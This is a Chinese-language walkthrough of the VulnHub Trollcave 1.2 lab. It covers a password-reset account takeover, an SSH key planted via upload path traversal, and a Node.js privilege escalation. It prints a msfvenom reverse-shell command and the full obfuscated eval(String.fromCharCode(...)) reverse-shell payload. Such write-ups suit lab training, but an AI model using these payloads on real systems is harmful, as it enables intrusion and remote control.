前言
⏰时间2023.6.26
🗺️靶机地址:https://www.vulnhub.com/entry/trollcave-12,230/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
首先发现目标128那是kali,目标是132
然后扫132开启了啥,nmap -sS -A -T4 -v -p- 192.168.58.132
80端口是这个
先扫了下目录,没发现什么,我用的dirsearch,或者dirb,那个robots.txt没啥东西
进网站看看信息,在home下面有个password reset,进去提示访问password_resets
直接访问是不行的,于是继续将其作为路径去扫目录
密码重置
访问http://192.168.58.132/password_resets/new进入重置页面在输入框中输入xer,点击重置,得到一个链接
进入页面后输入新密码,长度不小于10位,确认后直接就是登录状态
进入后看到有文件上传,但是功能没启用,无法上传,留言板无法弹cookie,标签被实体编码了
进入users发现一个king用户,是superadmin,可能是超管用户于是想到刚才重置密码的链接,重置xer用户,链接里有个?name=xer,他是通过name传参来识别重置哪个用户的密码,可以抓包把xer改为king试试,直接改改不了,只能改普通用户,所以得抓包试
退出当前xer账号,重新在重置密码页面输出重置某个用户,拿到重置链接进入,抓取输入密码提交的这个包,将其中的用户名部分改为King
放包后进入King登录后的页面
ssh免密登录
然后如图所示开启upload可以直接上传一句话php,右键delete可以看到路径
尝试去访问,发现他这个不解析php,此路不通
home页面下有个sudo give me sudo,点进去提示使用rails用户
他这个开着22端口,结合这个文件上传可以传公钥免密登录
kali生成公钥ssh-keygen -t rsa
上传文件时看到返回的绝对路径,上传时可以设置文件名以及路径,使用…/穿越到/home/rails/.ssh/authorized_keys成功传到指定目录下
ssh -i id_rsa rails@192.168.58.132 ssh登录
提权
可以使用 /bin/bash -i 进入交互式
不存在find命令suid提权查看版本信息
msf中search 4.4.0-116
目标不存在gcc
kali上编译,最后目标执行提权失败
提权失败,尝试其他方法
Node js
进入home下的king,发现calc.js,其中提及127.0.0.1:8888端口的服务
查看当前监听端口
rails@trollcave:/home/king/calc$ netstat -antulp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 1065/ruby2.3
tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN -
文件名提示着什么
这里用toString转化为字符串,我们可以将sum替换为反弹shell
下面用msf生成反向js
msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.58.153 lport=8888 -o rev.js
再插入一句
echo '1+1;' >> rev.js
将目标内网8888与本机9999打通
ssh -L9999:localhost:8888 -i id_rsa rails@192.168.58.209 -f -N
访问本机9999
用一段python脚本将rev.js转化成ascii码
#!/usr/bin/env python
f = open('rev.js', 'r')
encoded = ''
for c in f.read():
encoded = encoded + ',' + str(ord(c))
print 'eval(String.fromCharCode(%s))' % encoded[1:]
┌──(root㉿Erik)-[~eric/myfile]
└─# python2 encode.py
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,123,32,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,32,105,102,32,40,33,114,101,113,117,105,114,101,41,32,114,101,116,117,114,110,59,32,118,97,114,32,99,109,100,32,61,32,40,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,109,97,116,99,104,40,47,94,119,105,110,47,105,41,41,32,63,32,34,99,109,100,34,32,58,32,34,47,98,105,110,47,115,104,34,59,32,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,34,110,101,116,34,41,44,32,99,112,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,44,32,117,116,105,108,32,61,32,114,101,113,117,105,114,101,40,34,117,116,105,108,34,41,44,32,115,104,32,61,32,99,112,46,115,112,97,119,110,40,99,109,100,44,32,91,93,41,59,32,118,97,114,32,99,108,105,101,110,116,32,61,32,116,104,105,115,59,32,118,97,114,32,99,111,117,110,116,101,114,61,48,59,32,102,117,110,99,116,105,111,110,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,32,61,32,110,101,116,46,99,111,110,110,101,99,116,40,56,56,56,56,44,32,34,49,57,50,46,49,54,56,46,53,56,46,49,53,51,34,44,32,102,117,110,99,116,105,111,110,40,41,32,123,32,99,108,105,101,110,116,46,115,111,99,107,101,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,32,105,102,32,40,116,121,112,101,111,102,32,117,116,105,108,46,112,117,109,112,32,61,61,61,32,34,117,110,100,101,102,105,110,101,100,34,41,32,123,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,101,108,115,101,32,123,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,111,117,116,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,117,116,105,108,46,112,117,109,112,40,115,104,46,115,116,100,101,114,114,44,32,99,108,105,101,110,116,46,115,111,99,107,101,116,41,59,32,125,32,125,41,59,32,115,111,99,107,101,116,46,111,110,40,34,101,114,114,111,114,34,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,41,32,123,32,99,111,117,110,116,101,114,43,43,59,32,105,102,40,99,111,117,110,116,101,114,60,61,32,49,48,41,123,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,125,44,32,53,42,49,48,48,48,41,59,32,125,32,101,108,115,101,32,112,114,111,99,101,115,115,46,101,120,105,116,40,41,59,32,125,41,59,32,125,32,83,116,97,103,101,114,82,101,112,101,97,116,40,41,59,32,125,41,40,41,59,49,43,49,59,10))